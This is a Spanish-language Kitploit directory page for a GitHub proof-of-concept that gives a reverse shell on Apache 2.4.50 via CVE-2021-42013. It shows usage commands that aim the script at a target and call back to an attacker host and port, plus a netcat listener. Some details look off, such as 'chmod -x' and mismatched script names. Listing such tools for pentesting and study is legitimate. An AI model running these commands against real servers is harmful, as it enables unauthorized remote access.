Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-42013_Reverse-Shell — PoC CVE-2021-42013 reverse shell Apache 2.4.50 con CGI | Kitploit
Herramientas/GitHubGitHub/thelastvvv/cve-2021-42013_reverse-shell
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso Remoto
GitHubthelastvvv/cve-2021-42013_reverse-shell

CVE-2021-42013_Reverse-Shell

PoC CVE-2021-42013 reverse shell Apache 2.4.50 con CGI

Ver Repositorio
721hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2021-42013_Reverse-Shell

PoC CVE-2021-42013 reverse shell Apache 2.4.50 con CGI

Uso :

root@kitploit:~
chmod -x CVE-2021-42013.sh
./CVE-2021-42013_reverseshell.sh http://ip:port/ LHOST LPORT

Más información:

root@kitploit:~
chmod -x CVE-2021-42013.sh
./CVE-2021-42013_reverseshell.sh http://ip:8083 10.0.000.000 9999
 nc -lvnp 9999
 

Referencias

https://nvd.nist.gov/vuln/detail/CVE-2021-42013

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42013

https://tryhackme.com/room/cve202141773

Descargar herramienta